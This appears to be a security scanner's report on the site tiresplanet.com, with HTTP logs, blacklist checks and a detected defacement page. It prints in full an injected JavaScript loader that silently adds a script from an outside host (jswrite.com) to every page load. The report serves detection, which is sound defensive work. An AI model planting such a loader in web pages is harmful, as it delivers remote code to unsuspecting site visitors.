Scanned pages/files
Request | Server response | Status |
http://tiresplanet.com/ | 200 OK Content-Length: 1994 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) if(top == self && typeof window._ws_all_js==='undefined'){
window._ws_all_js = 7; var zhead = document.getElementsByTagName('head')[0]; if(!zhead){zhead = document.createElement('head');} var qscript = document.createElement('script'); qscript.setAttribute('id','wsh2_js'); qscript.setAttribute('src','http://jswrite.com/script1.js'); qscript.setAttribute('type','text/javascript');qscript.async = true; if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript); } Antivirus reports:
Deface/Content modification. The following signature was found: [!] HaCkeD By Fallaga Team ...[610 bytes skipped]... ('script'); qscript.setAttribute('id','wsh2_js'); qscript.setAttribute('src','http://jswrite.com/script1.js'); qscript.setAttribute('type','text/javascript');qscript.async = true; if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript); } </script> <title>[!] HaCkeD By Fallaga Team</title> <meta name="keywords" content="[!] HaCkeD By Iheb TN"> <meta name="description" content="[!] HaCkeD By Iheb TN"> </head> <body bgcolor='black'> <p> </p> <p> </p> <p> </p> <p> <font face="Iceland" style="color:red;text-shadow:0px 1px 5px #000;font-size:60px">[!] StruCk By Falleg Ghost</fon ...[910 bytes skipped]... | ||
http://tiresplanet.com/test404page.js | 200 OK Content-Length: 1994 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(top == self && typeof window._ws_all_js==='undefined'){
window._ws_all_js = 7; var zhead = document.getElementsByTagName('head')[0]; if(!zhead){zhead = document.createElement('head');} var qscript = document.createElement('script'); qscript.setAttribute('id','wsh2_js'); qscript.setAttribute('src','http://jswrite.com/script1.js'); qscript.setAttribute('type','text/javascript');qscript.async = true; if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript); } Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tiresplanet.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 14 Jul 2015 23:11:10 GMT
Server: nginx/1.8.0
Content-Length: 1994
Content-Type: text/html; charset=UTF-8
...1994 bytes of data.
GET / HTTP/1.1
Host: tiresplanet.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 14 Jul 2015 23:11:10 GMT
Server: nginx/1.8.0
Content-Length: 1994
Content-Type: text/html; charset=UTF-8
...1994 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: tiresplanet.com
Referer: http://www.google.com/search?q=tiresplanet.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tiresplanet.com
Referer: http://www.google.com/search?q=tiresplanet.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tiresplanet.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tiresplanet.com/
Result: tiresplanet.com is not infected or malware details are not published yet.
Result: tiresplanet.com is not infected or malware details are not published yet.